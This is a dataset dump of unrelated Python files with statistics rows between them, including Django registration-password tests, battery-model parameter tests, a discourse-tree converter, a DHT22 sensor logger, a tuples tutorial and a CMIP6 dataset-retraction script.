self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertIn(
"password with at least 8 characters",
response.data["errors"]["password"][0]
)
def test_empty_password(self):
""" test invalid password """
self.new_user["user"]["password"] = ''
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertEqual(
response.data["errors"]["password"][0],
"This field may not be blank."
)
def test_uppercase_password(self):
""" test that the password contains an uppercase letter """
self.new_user["user"]["password"] = 'codetitans32'
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertIn(
"at least one number, an uppercase or lowercase letter",
response.data["errors"]["password"][0]
)
def test_lowercase_password(self):
""" test that the password contains an lowercase letter """
self.new_user["user"]["password"] = 'CODETITANS32'
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertIn(
"at least one number, an uppercase or lowercase letter",
response.data["errors"]["password"][0]
)
def test_special_character_password(self):
""" test that the password contains a special character """
self.new_user["user"]["password"] = 'Codetitans32'
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertIn(
"lowercase letter or one special character",
response.data["errors"]["password"][0]
)
def test_number_in_password(self):
""" test that the password contains a number """
self.new_user["user"]["password"] = 'Codetitans@!'
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertIn(
"Password should have at least one number",
response.data["errors"]["password"][0]
)
def test_register_user(self):
""" test register user """
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_201_CREATED
)
def test_existing_email(self):
""" test register with existing user email """
self.new_user["user"]["email"] = self.user["user"]["email"]
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
def test_existing_username(self):
""" test register with existing username """
self.new_user["user"]["username"] = self.user["user"]["username"]
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
| 31.306122 | 107 | 0.602347 | 669 | 6,136 | 5.313901 | 0.168909 | 0.060759 | 0.08045 | 0.073136 | 0.686639 | 0.662166 | 0.625879 | 0.585091 | 0.539522 | 0.531083 | 0 | 0.014443 | 0.289113 | 6,136 | 195 | 108 | 31.466667 | 0.80055 | 0.078716 | 0 | 0.486111 | 0 | 0 | 0.138111 | 0 | 0 | 0 | 0 | 0 | 0.152778 | 1 | 0.097222 | false | 0.138889 | 0.048611 | 0 | 0.159722 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
69c769830c272d7a9f4d246a127dbb4b3989b330 | 1,399 | py | Python | tests/unit/test_parameters/test_geometric_parameters.py | manjunathnilugal/PyBaMM | 65d5cba534b4f163670e753714964aaa75d6a2d2 | [
"BSD-3-Clause"
] | 330 | 2019-04-17T11:36:57.000Z | 2022-03-28T16:49:55.000Z | tests/unit/test_parameters/test_geometric_parameters.py | masoodtamaddon/PyBaMM | a31e2095600bb92e913598ac4d02b2b6b77b31c1 | [
"BSD-3-Clause"
] | 1,530 | 2019-03-26T18:13:03.000Z | 2022-03-31T16:12:53.000Z | tests/unit/test_parameters/test_geometric_parameters.py | masoodtamaddon/PyBaMM | a31e2095600bb92e913598ac4d02b2b6b77b31c1 | [
"BSD-3-Clause"
] | 178 | 2019-03-27T13:48:04.000Z | 2022-03-31T09:30:11.000Z | #
# Tests for the standard parameters
#
import pybamm
import unittest
class TestGeometricParameters(unittest.TestCase):
def test_macroscale_parameters(self):
geo = pybamm.geometric_parameters
L_n = geo.L_n
L_s = geo.L_s
L_p = geo.L_p
L_x = geo.L_x
l_n = geo.l_n
l_s = geo.l_s
l_p = geo.l_p
parameter_values = pybamm.ParameterValues(
values={
"Negative electrode thickness [m]": 0.05,
"Separator thickness [m]": 0.02,
"Positive electrode thickness [m]": 0.21,
}
)
L_n_eval = parameter_values.process_symbol(L_n)
L_s_eval = parameter_values.process_symbol(L_s)
L_p_eval = parameter_values.process_symbol(L_p)
L_x_eval = parameter_values.process_symbol(L_x)
self.assertEqual(
(L_n_eval + L_s_eval + L_p_eval).evaluate(), L_x_eval.evaluate()
)
l_n_eval = parameter_values.process_symbol(l_n)
l_s_eval = parameter_values.process_symbol(l_s)
l_p_eval = parameter_values.process_symbol(l_p)
self.assertAlmostEqual((l_n_eval + l_s_eval + l_p_eval).evaluate(), 1)
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
| 28.55102 | 78 | 0.620443 | 197 | 1,399 | 4.020305 | 0.28934 | 0.025253 | 0.167929 | 0.229798 | 0.433081 | 0.433081 | 0.391414 | 0.391414 | 0.391414 | 0.391414 | 0 | 0.01003 | 0.287348 | 1,399 | 48 | 79 | 29.145833 | 0.784353 | 0.023588 | 0 | 0 | 0 | 0 | 0.091777 | 0 | 0 | 0 | 0 | 0 | 0.054054 | 1 | 0.027027 | false | 0 | 0.081081 | 0 | 0.135135 | 0.027027 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69c79c1acedc30f9a5022e2647ed20f40fd5e207 | 1,860 | py | Python | src/preprocessing1/convert_ctrees_to_dtrees_rstdt.py | norikinishida/discourse-parsing | 7377a78cc32ad6430d256694e31ed9426e7c6340 | [
"Apache-2.0"
] | 2 | 2022-02-16T20:41:22.000Z | 2022-03-11T18:28:24.000Z | src/preprocessing1/convert_ctrees_to_dtrees_rstdt.py | norikinishida/discourse-parsing | 7377a78cc32ad6430d256694e31ed9426e7c6340 | [
"Apache-2.0"
] | null | null | null | src/preprocessing1/convert_ctrees_to_dtrees_rstdt.py | norikinishida/discourse-parsing | 7377a78cc32ad6430d256694e31ed9426e7c6340 | [
"Apache-2.0"
] | null | null | null | import argparse
import os
import pyprind
import utils
import treetk
import treetk.rstdt
def main(args):
"""
We use n-ary ctrees (ie., *.labeled.nary.ctree) to generate dtrees.
Morey et al. (2018) demonstrate that scores evaluated on these dtrees are superficially lower than those on right-heavy binarized trees (ie., *.labeled.bin.ctree).
"""
path = args.path
filenames = os.listdir(path)
filenames = [n for n in filenames if n.endswith(".labeled.nary.ctree")]
filenames.sort()
def func_label_rule(node, i, j):
relations = node.relation_label.split("/")
if len(relations) == 1:
return relations[0] # Left-most node is head.
else:
if i > j:
return relations[j]
else:
return relations[j-1]
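# Hedged illustration of the rule above (assuming i indexes the head child
# and j the dependent child): for a node labeled "attribution/elaboration"
# with head child 0, the arc to child 1 takes relations[0] ("attribution")
# and the arc to child 2 takes relations[1]; a dependent to the left of the
# head (i > j) takes relations[j] directly.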
for filename in pyprind.prog_bar(filenames):
sexp = utils.read_lines(
os.path.join(path, filename),
process=lambda line: line.split())
assert len(sexp) == 1
sexp = sexp[0]
# Constituency
ctree = treetk.rstdt.postprocess(treetk.sexp2tree(sexp, with_nonterminal_labels=True, with_terminal_labels=False))
# Dependency
# Assign heads
ctree = treetk.rstdt.assign_heads(ctree)
# Conversion
dtree = treetk.ctree2dtree(ctree, func_label_rule=func_label_rule)
arcs = dtree.tolist(labeled=True)
# Write
with open(os.path.join(
path,
filename.replace(".labeled.nary.ctree", ".arcs")), "w") as f:
f.write("%s\n" % " ".join(["%d-%d-%s" % (h,d,l) for h,d,l in arcs]))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--path", type=str, required=True)
args = parser.parse_args()
main(args=args)
| 30 | 167 | 0.597849 | 233 | 1,860 | 4.669528 | 0.493562 | 0.030331 | 0.044118 | 0.025735 | 0.040441 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00824 | 0.282258 | 1,860 | 61 | 168 | 30.491803 | 0.806742 | 0.166667 | 0 | 0.051282 | 1 | 0 | 0.047244 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 1 | 0.051282 | false | 0 | 0.153846 | 0 | 0.282051 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69d1dab7f54ca1ad815eec0feddd2d80d74004a4 | 912 | py | Python | straitlets/tests/test_test_utils.py | quantopian/serializable-traitlets | f7de75507978e08446a15894a8417997940ea7a6 | [
"Apache-2.0"
] | 13 | 2016-01-27T01:55:18.000Z | 2022-02-10T12:09:46.000Z | straitlets/tests/test_test_utils.py | quantopian/serializable-traitlets | f7de75507978e08446a15894a8417997940ea7a6 | [
"Apache-2.0"
] | 5 | 2016-02-17T13:52:50.000Z | 2018-12-13T21:30:26.000Z | straitlets/tests/test_test_utils.py | quantopian/serializable-traitlets | f7de75507978e08446a15894a8417997940ea7a6 | [
"Apache-2.0"
] | 10 | 2017-07-21T14:27:17.000Z | 2022-03-16T11:19:47.000Z | """
Tests for the test utils.
"""
import pytest
from straitlets import Serializable, Integer
from straitlets.test_utils import assert_serializables_equal
def test_assert_serializables_equal():
class Foo(Serializable):
x = Integer()
y = Integer()
class Bar(Serializable):
x = Integer()
y = Integer()
assert_serializables_equal(Foo(x=1, y=1), Foo(x=1, y=1))
with pytest.raises(AssertionError):
assert_serializables_equal(Foo(x=1, y=1), Bar(x=1, y=1))
with pytest.raises(AssertionError):
assert_serializables_equal(Foo(x=1, y=1), Foo(x=1, y=2))
with pytest.raises(AssertionError):
assert_serializables_equal(
Foo(x=1, y=1),
Foo(x=1, y=2),
skip=('x',),
)
assert_serializables_equal(Foo(x=1), Foo(x=1), skip=('y',))
assert_serializables_equal(Foo(y=1), Foo(y=1), skip=('x',))
| 25.333333 | 64 | 0.625 | 127 | 912 | 4.346457 | 0.204724 | 0.036232 | 0.081522 | 0.076087 | 0.586957 | 0.485507 | 0.432971 | 0.432971 | 0.432971 | 0.432971 | 0 | 0.028409 | 0.22807 | 912 | 35 | 65 | 26.057143 | 0.755682 | 0.027412 | 0 | 0.304348 | 0 | 0 | 0.003413 | 0 | 0 | 0 | 0 | 0 | 0.478261 | 1 | 0.043478 | false | 0 | 0.130435 | 0 | 0.434783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69d2955809d68e17f8be812fa27e25216fd7813e | 4,026 | py | Python | fdm/analysis/tools.py | szajek/FDM | 6270b0eb2bf3ef80f2ed87d0f39cf39ab82ae02b | [
"MIT"
] | 1 | 2017-11-12T09:57:52.000Z | 2017-11-12T09:57:52.000Z | fdm/analysis/tools.py | szajek/FDM | 6270b0eb2bf3ef80f2ed87d0f39cf39ab82ae02b | [
"MIT"
] | null | null | null | fdm/analysis/tools.py | szajek/FDM | 6270b0eb2bf3ef80f2ed87d0f39cf39ab82ae02b | [
"MIT"
] | null | null | null | import numpy
from fdm.geometry import create_close_point_finder
def create_weights_distributor(close_point_finder):
def distribute(point, value):
close_points = close_point_finder(point)
distance_sum = sum(close_points.values())
return dict(
{p: (1. - distance/distance_sum)*value for p, distance in close_points.items()},
)
return distribute
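# Worked example (hedged): with two close points at distances 1. and 3.,
# distance_sum is 4., so distribute(p, 10.) yields (1 - 1/4)*10 = 7.5 for the
# nearer point and (1 - 3/4)*10 = 2.5 for the farther one. Note the weights
# sum to the full value only for exactly two close points (with n points they
# sum to (n-1)*value), which is worth keeping in mind when swapping finders.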
def apply_statics_bc(variables, matrix, vector, bcs):
extra_bcs = extract_extra_bcs(bcs)
replace_bcs = extract_replace_bcs(bcs)
extra_bcs_number = len(extra_bcs)
_matrix = numpy.copy(matrix)
_vector = numpy.copy(vector)
assert _rows_number(_matrix) == len(variables), 'Number of BCs must be equal "vars_number" - "real_nodes_number"'
points = list(variables)
matrix_bc_applicator = create_matrix_bc_applicator(_matrix, points, variables)
vector_bc_applicator = create_vector_bc_applicator(_vector)
for i, (scheme, value, replace) in enumerate(replace_bcs):
matrix_bc_applicator(variables[replace], scheme)
vector_bc_applicator(variables[replace], value)
initial_idx = _rows_number(matrix) - extra_bcs_number
for i, (scheme, value, _) in enumerate(extra_bcs):
matrix_bc_applicator(initial_idx + i, scheme)
vector_bc_applicator(initial_idx + i, value)
return _matrix, _vector
def apply_dynamics_bc(variables, matrix_a, matrix_b, bcs):
extra_bcs = extract_extra_bcs(bcs)
replace_bcs = extract_replace_bcs(bcs)
extra_bcs_number = len(extra_bcs)
_matrix_a = numpy.copy(matrix_a)
_matrix_b = numpy.copy(matrix_b)
assert _rows_number(_matrix_a) == len(variables), 'Number of BCs must be equal "vars_number" - "real_nodes_number"'
points = list(variables)
matrix_a_bc_applicator = create_matrix_bc_applicator(_matrix_a, points, variables)
matrix_b_bc_applicator = create_matrix_bc_applicator(_matrix_b, points, variables)
for i, (scheme_a, scheme_b, replace) in enumerate(replace_bcs):
matrix_a_bc_applicator(variables[replace], scheme_a)
matrix_b_bc_applicator(variables[replace], scheme_b)
initial_idx = _rows_number(_matrix_a) - extra_bcs_number
for i, (scheme_a, scheme_b, _) in enumerate(extra_bcs):
matrix_a_bc_applicator(initial_idx + i, scheme_a)
matrix_b_bc_applicator(initial_idx + i, scheme_b)
return _matrix_a, _matrix_b
def extract_extra_bcs(bcs):
return [bc for bc in bcs if bc.replace is None]
def extract_replace_bcs(bcs):
return [bc for bc in bcs if bc.replace is not None]
def create_matrix_bc_applicator(matrix, points, variables, tol=1e-6):
def apply(row_idx, scheme):
matrix[row_idx, :] = 0.
if len(scheme):
distributor = SchemeToNodesDistributor(points)
scheme = distributor(scheme)
scheme = scheme.drop(tol)
for p, weight in scheme.items():
col_idx = variables[p]
matrix[row_idx, col_idx] = weight
return apply
def create_vector_bc_applicator(vector):
def apply(row_idx, value):
vector[row_idx] = value
return apply
def _zero_vector_last_rows(vector, number):
_vector = numpy.zeros(vector.shape)
_vector[:-number] = vector[:-number]
return _vector
def _zero_matrix_last_rows(matrix, number):
_matrix = numpy.zeros(matrix.shape)
_matrix[:-number, :] = matrix[:-number, :]
return _matrix
def _rows_number(matrix):
return matrix.shape[0]
def _cols_number(matrix):
return matrix.shape[1]
class SchemeToNodesDistributor(object):
def __init__(self, nodes):
self._distributor = WeightsDistributor(nodes)
def __call__(self, scheme):
return scheme.distribute(self._distributor)
class WeightsDistributor(object):
def __init__(self, nodes):
self._distributor = create_weights_distributor(
create_close_point_finder(nodes)
)
def __call__(self, point, weight):
return self._distributor(point, weight) | 30.5 | 119 | 0.709389 | 530 | 4,026 | 5.00566 | 0.15283 | 0.081417 | 0.047493 | 0.036185 | 0.480211 | 0.356201 | 0.257067 | 0.159065 | 0.159065 | 0.159065 | 0 | 0.00186 | 0.198957 | 4,026 | 132 | 120 | 30.5 | 0.820775 | 0 | 0 | 0.134831 | 0 | 0 | 0.031289 | 0 | 0 | 0 | 0 | 0 | 0.022472 | 1 | 0.202247 | false | 0 | 0.022472 | 0.067416 | 0.404494 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69d3674b80e0407aa5556ee4e06d257e26cbc733 | 1,058 | py | Python | dht22.py | trihatmaja/dht22-raspi | 7bce4b1c35d9eed9e4913caa6f3b9b3aed5c3219 | [
"MIT"
] | null | null | null | dht22.py | trihatmaja/dht22-raspi | 7bce4b1c35d9eed9e4913caa6f3b9b3aed5c3219 | [
"MIT"
] | null | null | null | dht22.py | trihatmaja/dht22-raspi | 7bce4b1c35d9eed9e4913caa6f3b9b3aed5c3219 | [
"MIT"
] | null | null | null | import Adafruit_DHT as dht
import time
from influxdb import InfluxDBClient
def get_serial():
cpu_serial = "0000000000000000"
try:
f = open('/proc/cpuinfo', 'r')
for line in f:
if line[0:6] == 'Serial':
cpu_serial = line[10:26]
f.close()
except Exception:
cpu_serial = "ERROR000000000"
return cpu_serial
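# Hedged example of the line being parsed (exact spacing varies by Pi model,
# so the [10:26] slice above is an assumption about that layout):
# "Serial          : 00000000abcdef12" -> cpu_serial = "00000000abcdef12"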
def write_db(tmp, hum, device_id):
json_body = [
{
"measurement": "temperature",
"tags": {
"device_id": str(device_id),
},
"fields": {
"celcius": str('{0:0.2f}'.format(tmp)),
"humidity": str('{0:0.2f}'.format(hum)),
}
}
]
client = InfluxDBClient('localhost', 8086, "", "", "raspi_temp")
client.write_points(json_body)
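# Hedged usage sketch: written points can be inspected afterwards with the
# client's query() method, e.g. client.query('SELECT * FROM "temperature" LIMIT 5');
# the measurement name matches json_body above, and the database name is the
# one passed to InfluxDBClient.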
def main():
device_id = get_serial()
while True:
h,t = dht.read_retry(dht.DHT22, 4)
write_db(t, h, device_id)
print ('Temp={0:0.2f}*C Humidity={1:0.2f}%'.format(t, h))
time.sleep(5)
if __name__ == '__main__':
main()
| 23.511111 | 66 | 0.535917 | 131 | 1,058 | 4.122137 | 0.526718 | 0.074074 | 0.022222 | 0.025926 | 0.048148 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069577 | 0.307183 | 1,058 | 44 | 67 | 24.045455 | 0.667121 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.078947 | null | null | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69e260f9ca6210cf18c090c8a49bc65255c0f206 | 856 | py | Python | 03-datatypes/examples/07-tuples.py | luxwarp/python-course | d6ec4961ef43bd9d99954cffaea837220638e83f | [
"0BSD"
] | null | null | null | 03-datatypes/examples/07-tuples.py | luxwarp/python-course | d6ec4961ef43bd9d99954cffaea837220638e83f | [
"0BSD"
] | null | null | null | 03-datatypes/examples/07-tuples.py | luxwarp/python-course | d6ec4961ef43bd9d99954cffaea837220638e83f | [
"0BSD"
] | null | null | null | #!/usr/bin/env python3
# tuples is a type of list.
# tuples is immutable.
# the structure of a tuple: (1, "nice work", 2.3, [1,2,"hey"])
my_tuple = ("hey", 1, 2, "hey ho!", "hey", "hey")
print("My tuple:", my_tuple)
# to get a tuple value use its index
print("Second item in my_tuple:", my_tuple[1])
# to count how many times a values appears in a tuple: tuple.count(value)
# returns 0 if no values exists.
print("How many 'hey' in my_tuple:", my_tuple.count("hey"))
# to get the index of a tuple item: tuple.index(value)
# if the value does not exist you will get an error like "ValueError: tuple.index(x): x not in tuple"
print("Index position of 'hey ho!' in my_tuple:", my_tuple.index("hey ho!"))
# tuples are immutable so you cannot reassign a value like
# my_tuple[2] = "wop wop"
# TypeError: 'tuple' object does not support item assignment
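# a hedged workaround sketch: to "change" a tuple, build a new one instead,
# for example by round-tripping through a list.
as_list = list(my_tuple)
as_list[2] = "wop wop"
my_tuple = tuple(as_list)
print("Rebuilt tuple:", my_tuple)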
| 35.666667 | 97 | 0.693925 | 157 | 856 | 3.726115 | 0.414013 | 0.119658 | 0.061538 | 0.095727 | 0.082051 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015471 | 0.169393 | 856 | 23 | 98 | 37.217391 | 0.807314 | 0.65771 | 0 | 0 | 0 | 0 | 0.448399 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.8 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
69e2f9e47e947283eba6f71f70baad174d0962cb | 7,048 | py | Python | retraction_synda.py | meteorologist15/synda_retraction | 4a9174d2bc5d3573b5cdd39636380607120d586c | [
"CC0-1.0"
] | null | null | null | retraction_synda.py | meteorologist15/synda_retraction | 4a9174d2bc5d3573b5cdd39636380607120d586c | [
"CC0-1.0"
] | null | null | null | retraction_synda.py | meteorologist15/synda_retraction | 4a9174d2bc5d3573b5cdd39636380607120d586c | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python3
import subprocess
import requests
import json
import os
import re
import argparse
import logging
import csv
import shutil
retracted_exps = "retracted_exps.csv"  # CSV listing retracted experiments; read in get_retraction_list().
logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
handle_api = "https://hdl.handle.net/api/handles/"
def get_tracking_ids(pid):
# All pid's begin with 'hdl:'. Start at index 4 for api
pid = pid[4:]
web_output = requests.get(handle_api + pid)
json_output = web_output.json()
tracking_ids = json_output['values'][4]['data']['value'] # A semicolon-separated string is returned
return tracking_ids
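# Hedged usage sketch: the return value is a single semicolon-separated
# string, so callers needing individual ids can split it, e.g.
#   ids = get_tracking_ids("hdl:21.14100/example").split(";")
# (the handle suffix here is illustrative, not a real record; note also that
# the hard-coded ['values'][4] index assumes a fixed handle-record layout).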
def set_synda_path():
synda_home = "/path/to/synda/sdt"
synda_execdir = synda_home + "/bin:"
if not os.getenv("ST_HOME", default=0):
os.environ["ST_HOME"] = synda_home
if not synda_execdir in os.getenv("PATH"):
os.environ["PATH"] = synda_execdir + os.getenv("PATH")
def write_pid_json(retraction_list):
pid_file = "pid_retractions.csv"
success_count = 0
failure_count = 0
with open(pid_file, 'ab') as f:
for line in retraction_list:
# Dump metadata for each dataset using Synda to retrieve the PID
meta_cmd = ["synda", "dump", line.rstrip("\n")]
meta_dump = subprocess.run(meta_cmd, stdout=subprocess.PIPE)
meta_json = meta_dump.stdout.decode("utf-8")
if len(meta_json) > 0:
meta_json = json.loads(meta_json)
try:
pid_output = meta_json[0]["pid"]
except (IndexError, KeyError) as err:
logging.error("Problems reading JSON. Skipping.\n%s\n" % err)
failure_count += 1
continue
tracking_ids = get_tracking_ids(pid_output)
# Write the dataset PID, dataset ID, and semicolon separated tracking_id's to file
final_output_line = "%s,%s,%s\n" % (pid_output, line.replace("\n", ""), tracking_ids)
f.write(bytes(final_output_line, "UTF-8"))
success_count += 1
logging.info("%s/%s dataset pid's written" % (str(success_count), str(len(retraction_list))))
else:
logging.warning("The dataset %s was not processed. Did not find metadata dump from Synda. Skipping." % line)
class Retractor(object):
def __init__(self, institutions=None, project=None):
self.project = "CMIP6" if project is None else ','.join(project)
def clean_list(self, synda_search):
# Some preprocess cleaning here #
for i in range(len(synda_search)):
synda_search[i] = re.search('[A-Z].*', synda_search[i]).group() + "\n"
return synda_search
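# Hedged example of the cleaning above: synda search lines look roughly like
# "  new  CMIP6.CMIP.IPSL.IPSL-CM6A-LR...." and the regex keeps everything
# from the first capital letter, i.e. the dataset id (the lowercase status
# prefix is an assumption about synda's output format).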
def finalize_list(self, search_command):
search_proc = subprocess.run(search_command, stdout=subprocess.PIPE)
search_output = search_proc.stdout.decode("utf-8").splitlines()
retract_list = self.clean_list(search_output) # Without the extra text in the beginning
return retract_list
def get_processed_retractions(self):
# This is if you have run the script before. pid_retractions.csv is an already completed set of retractions, i.e. already "processed". Read this into memory for eventual comparison with new retraction list.
pid_retracted_file = "pid_retractions.csv"
already_processed = []
if os.path.exists(pid_retracted_file):
with open(pid_retracted_file, 'r') as f:
already_processed = f.readlines()
return already_processed
def refine_list(self, retraction_list):
# Compare with those already processed from beforehand/previous as retracted. This cancels out some redundancy.
processed_list = self.get_processed_retractions()
for line in processed_list:
comparison = re.search(',(.*),', line).group(1) + "\n"
if comparison in retraction_list:
try:
retraction_list.remove(comparison)
except ValueError as err:
logging.warning("Something went terribly wrong. Skipping.")
continue
return retraction_list
def get_retraction_list(self):
main_list = []
memory_list = []
# Read generic retraction info into memory
try:
with open(retracted_exps, newline='') as f:
esgf_reader = csv.reader(f, quotechar='|', quoting=csv.QUOTE_MINIMAL)
for row in esgf_reader:
memory_list.append(row)
except OSError as e:
logging.error("The file %s doesn't exist. Quitting." % retracted_exps)
raise
# Use Synda to search by experiment_id, refine the list, and add continually add retractions to main list
for sublist in memory_list:
search_cmd = ["synda", "search", "project=CMIP6", "retracted=true", "experiment_id=%s" % sublist[0], "-l", "8999"]
if sublist[2] == 'no_overflow':
logging.info("Getting data from experiment %s" % sublist[0])
refined_list = self.refine_list(self.finalize_list(search_cmd))
if len(refined_list) > 0:
main_list.extend(refined_list)
logging.info("Added %s entries from this experiment. Total to add: %s" % (str(len(refined_list)), str(len(main_list))))
else:
logging.info("No entries to add for this experiment")
# Execute searches using variant label instead of simply experiment_id if retractions >= 9000
else:
logging.info("Getting data from experiment %s. Over 9000 retractions." % sublist[0])
ensemble_dict = json.loads(sublist[2].replace('|', ','))
for variant_label in ensemble_dict.keys():
logging.info("Getting data from variant label (ensemble) %s" % variant_label)
search_cmd = ["synda", "search", "project=CMIP6", "retracted=true", "experiment_id=%s" % sublist[0], "variant_label=%s" % variant_label, "-l", "8999"]
refined_list = self.refine_list(self.finalize_list(search_cmd))
if len(refined_list) > 0:
main_list.extend(refined_list)
logging.info("Added %s entries from this variant_label. Total to add: %s" % (str(len(refined_list)), str(len(main_list))))
else:
logging.info("No entries to add for this variant_label")
return main_list # These are the retractions we care to add
if __name__ == "__main__":
set_synda_path()
logging.info("Creating PID backup...")
shutil.copy2("pid_retractions.csv", "pid_retractions.csv.prev")
ret = Retractor()
myretractlist = ret.get_retraction_list()
write_pid_json(myretractlist)
| 36.518135 | 214 | 0.614784 | 876 | 7,048 | 4.76484 | 0.27968 | 0.026354 | 0.020364 | 0.015812 | 0.152372 | 0.146143 | 0.146143 | 0.128414 | 0.128414 | 0.128414 | 0 | 0.008488 | 0.281215 | 7,048 | 192 | 215 | 36.708333 | 0.815436 | 0.135783 | 0 | 0.125 | 0 | 0 | 0.167051 | 0.00395 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.075 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69e3ad1eebd1e1fccdf1e001090572086c5c45ba | 366 | py | Python | theboss/network_simulation_strategy/network_simulation_strategy.py | Tomev/BoSS | 45db090345650741c85b39b47cbc7b391d6daa33 | [
"Apache-2.0"
] | null | null | null | theboss/network_simulation_strategy/network_simulation_strategy.py | Tomev/BoSS | 45db090345650741c85b39b47cbc7b391d6daa33 | [
"Apache-2.0"
] | 4 | 2020-07-10T00:28:43.000Z | 2020-10-12T11:51:38.000Z | theboss/network_simulation_strategy/network_simulation_strategy.py | Tomev/BoSS | 45db090345650741c85b39b47cbc7b391d6daa33 | [
"Apache-2.0"
] | 1 | 2020-09-12T15:35:09.000Z | 2020-09-12T15:35:09.000Z | __author__ = "Tomasz Rybotycki"
import abc
from numpy import ndarray
class NetworkSimulationStrategy(abc.ABC):
@classmethod
def __subclasshook__(cls, subclass):
return hasattr(subclass, "simulate") and callable(subclass.simulate)
@abc.abstractmethod
def simulate(self, input_state: ndarray) -> ndarray:
raise NotImplementedError
| 22.875 | 76 | 0.737705 | 37 | 366 | 7.054054 | 0.702703 | 0.122605 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.18306 | 366 | 15 | 77 | 24.4 | 0.87291 | 0 | 0 | 0 | 0 | 0 | 0.065574 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.1 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
69e3ea4c1c7c901fc078c30d615b40492cfe71fd | 769 | py | Python | ecommerce/core/migrations/0020_auto_20200923_1948.py | berrondo/ecommerce | daa0fa3c336d7e1e9816cc187f858bab7122fb1b | [
"MIT"
] | 1 | 2020-09-04T02:23:02.000Z | 2020-09-04T02:23:02.000Z | ecommerce/core/migrations/0020_auto_20200923_1948.py | berrondo/ecommerce | daa0fa3c336d7e1e9816cc187f858bab7122fb1b | [
"MIT"
] | null | null | null | ecommerce/core/migrations/0020_auto_20200923_1948.py | berrondo/ecommerce | daa0fa3c336d7e1e9816cc187f858bab7122fb1b | [
"MIT"
] | null | null | null | # Generated by Django 3.1.1 on 2020-09-23 19:48
from django.db import migrations, models
import django.db.models.deletion
